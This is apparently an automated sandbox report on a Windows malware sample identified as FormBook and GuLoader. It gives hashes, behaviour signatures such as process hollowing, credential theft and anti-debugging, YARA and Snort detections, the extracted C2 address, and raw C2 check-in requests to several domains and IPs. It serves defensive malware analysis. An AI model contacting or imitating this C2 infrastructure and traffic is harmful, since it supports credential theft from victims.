Windows Analysis Report
Lakeringernes (1).exe

Overview

General Information

Sample Name: Lakeringernes (1).exe
Analysis ID: 755081
MD5: d70de507cc0d22e43ebcf8b61a273ea5
SHA1: 9818fba05573d67b834c90a3208faddea3446545
SHA256: 4dbcd711f2263775f0a1083e0541a07247736ba2fdaabf000654756f8c3dae67
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Lakeringernes (1).exe Virustotal: Detection: 34% Perma Link
Source: Lakeringernes (1).exe ReversingLabs: Detection: 76%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.plentywindshield.com/ Avira URL Cloud: Label: malware
Source: http://www.plentywindshield.com/i036/?k0GP1N2=VaB2QWBCteskeZJAX4Hj3Mdw7Sfdvkj Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for unpacked file
Source: 10.0.explorer.exe.13ac3814.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.firefox.exe.6a93814.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.explorer.exe.13ac3814.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.explorer.exe.13ac3814.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.firefox.exe.6a93814.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.wscript.exe.4d53814.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.firefox.exe.6a93814.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.wscript.exe.859208.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.explorer.exe.13ac3814.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.techrocker.com/i036/"]}
Uses 32bit PE files
Source: Lakeringernes (1).exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Strikketjet Jump to behavior
Source: unknown HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49811 version: TLS 1.2
Source: Lakeringernes (1).exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wscript.pdbGCTL source: Lakeringernes (1).exe, 00000006.00000002.2316949720.000000001D5D0000.00000040.10000000.00040000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2293070467.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2295201513.000000001D4F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: Lakeringernes (1).exe, 00000006.00000003.2193655224.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2188097468.000000001D4AE000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2317196924.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2319202200.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2302177335.0000000004848000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6800398259.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6803662439.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2297441570.000000000469D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Lakeringernes (1).exe, Lakeringernes (1).exe, 00000006.00000003.2193655224.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2188097468.000000001D4AE000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2317196924.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2319202200.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000009.00000003.2302177335.0000000004848000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6800398259.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6803662439.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2297441570.000000000469D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wscript.pdb source: Lakeringernes (1).exe, 00000006.00000002.2316949720.000000001D5D0000.00000040.10000000.00040000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2293070467.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2295201513.000000001D4F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: firefox.pdb source: wscript.exe, 00000009.00000003.3009393083.0000000007F38000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00405FFD FindFirstFileA,FindClose, 2_2_00405FFD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_0040559B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00402688 FindFirstFileA, 2_2_00402688
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00612C70 FindFirstFileW,FindNextFileW,FindClose, 9_2_00612C70
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00612C6A FindFirstFileW,FindNextFileW,FindClose, 9_2_00612C6A
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 9_2_00608880
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 9_2_0060432E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 9_2_00608864
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 9_2_0060887F

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 156.254.172.36 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.213.44.213 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.204.24.45 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.238.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 96.43.100.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.23.41 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 156.230.149.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.106.120.176 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.151.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 50.87.192.144 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.63.2.175 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 168.76.162.220 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.48.6 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49845 -> 50.87.192.144:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49845 -> 50.87.192.144:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49845 -> 50.87.192.144:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49856 -> 66.29.151.40:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49856 -> 66.29.151.40:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49856 -> 66.29.151.40:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49908 -> 50.87.192.144:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49908 -> 50.87.192.144:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49908 -> 50.87.192.144:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.caglaakdag.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.techrocker.com/i036/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=yv3PuvLzWxpPEzbsw92WkcvntFSFr42Mhz+vE8sLITA0TeCZExOstoP49irgCfkKkles/RKXAXrXQmOnxmUvLiECiSxzmY5mCQ==&Rzu=hV1Pon HTTP/1.1Host: www.avatarworker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=ym8M/2tjPUpsy/4gmvkTuwE/MlV4j1mpuD/BZT5gSfNGNdlNobiMQCYFc1hZ19BTxGevG32o10SozpwTxQJqp+k2jOgcxoQgJQ==&Rzu=hV1Pon HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=30w/opVeBRN2BD0+t0iebV3O91uD3hif00liGkW1avQDMr6jPs+779cXRQTACeXbG8r7UUT2eiCtxWYMbSEep+TmmGq/ExRAOQ==&Rzu=hV1Pon HTTP/1.1Host: www.automotiveparts-store.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=KIxzD5HsRZBgKJlqtD/Z5Gj6Z8qoplCrxdfuDjJNx/1c9AJO6VXMMK+63l9AWb1/ssE5X6NYSlv5byLnNWr+FpxZxtTvuFnXWw==&Rzu=hV1Pon HTTP/1.1Host: www.aceadora.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=DDTM8NTjTGQKNl9ZmiWQMqmzY5hUHu6DmELfmDs1vEv26+wpTDEFgWjPjGJv2unzSeE04u298BAHHYXe+vHUgcxZ13bZmjQmZA==&Rzu=hV1Pon HTTP/1.1Host: www.haveusstampsale.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=BZwpaihTGJGWcZJSAe2sxznsnPej0JxCYfoQvgCgbuMQP061bK/C39YT663oVlO5elykthEFB/Dcn8VFPsLzIGidWMmSTKgllQ==&Rzu=hV1Pon HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=C2d71UQVeejWABy2lUSRL0f70CnRsZnWiEPbZ9IJ2qx2sLtfbvBuLRm7vEjCKtrH0IKHz9x/TFT4xXPEGBFmW1mbludPax5R3w==&Rzu=hV1Pon HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=ronhS2NZk+RpAH8xyVeuvsbzfj1G+JCO7SbBJB6VTjQ5GvCPMYygorm2sXuQ6whLqX4zWjebsFwcRWcR3e6VRFoMUbeOjCqRvg==&Rzu=hV1Pon HTTP/1.1Host: www.rsvstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=Nt7we/gwvJafOenmPtqMdMQq0A5S+F0mCo2A/o6NNSBEDFrZxTdugE3hHqQHgmQnwi6pFnnhcgi6C1+qKckarzI1zqVfAVRktw==&Rzu=hV1Pon HTTP/1.1Host: www.techrocker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=LMIqSMdQ3q0mQ0O8E4Be7P+zrPM6Gg4aprrhhSoZXI8N9fokAeXZtK7CAx7jxtppbBVDda4uu0E3KjN/+XSSDpZJ6husVXmnlg==&Rzu=hV1Pon HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=Ypm+0+Vc/krk+syJRkmS/ZXdqh86ue5y1szx5SRmlweqmqT2L40Pqi55gxfwp+7cpcP0UgmrVUc/vOiRo42zU0SjFnllzv841Q==&Rzu=hV1Pon HTTP/1.1Host: www.mangal20.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=gK12bHhqEy0e4Uj/ImUnYxfT+EkUqBjjVPatb5GnWKdwUy9sF2E4a2NySHYDGj5+R015BuqmsIpMnBRMM6PNmRTNIYpZBhLGAQ==&Rzu=hV1Pon HTTP/1.1Host: www.livinghopedoula.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=nUoi8bFrZKBgxi8j8+X6cHUsFDYNWYyZK5+gkPhwOd5YiI3qCsRWv9u9vhL8TMN6LbXPSZRgU6knpLXHXktn+vUZ7RewejrcRA==&Rzu=hV1Pon HTTP/1.1Host: www.planetthermo.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=yv3PuvLzWxpPEzbsw92WkcvntFSFr42Mhz+vE8sLITA0TeCZExOstoP49irgCfkKkles/RKXAXrXQmOnxmUvLiECiSxzmY5mCQ==&Rzu=hV1Pon HTTP/1.1Host: www.avatarworker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=ym8M/2tjPUpsy/4gmvkTuwE/MlV4j1mpuD/BZT5gSfNGNdlNobiMQCYFc1hZ19BTxGevG32o10SozpwTxQJqp+k2jOgcxoQgJQ==&Rzu=hV1Pon HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=30w/opVeBRN2BD0+t0iebV3O91uD3hif00liGkW1avQDMr6jPs+779cXRQTACeXbG8r7UUT2eiCtxWYMbSEep+TmmGq/ExRAOQ==&Rzu=hV1Pon HTTP/1.1Host: www.automotiveparts-store.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=KIxzD5HsRZBgKJlqtD/Z5Gj6Z8qoplCrxdfuDjJNx/1c9AJO6VXMMK+63l9AWb1/ssE5X6NYSlv5byLnNWr+FpxZxtTvuFnXWw==&Rzu=hV1Pon HTTP/1.1Host: www.aceadora.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=DDTM8NTjTGQKNl9ZmiWQMqmzY5hUHu6DmELfmDs1vEv26+wpTDEFgWjPjGJv2unzSeE04u298BAHHYXe+vHUgcxZ13bZmjQmZA==&Rzu=hV1Pon HTTP/1.1Host: www.haveusstampsale.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=BZwpaihTGJGWcZJSAe2sxznsnPej0JxCYfoQvgCgbuMQP061bK/C39YT663oVlO5elykthEFB/Dcn8VFPsLzIGidWMmSTKgllQ==&Rzu=hV1Pon HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:21:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:21:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
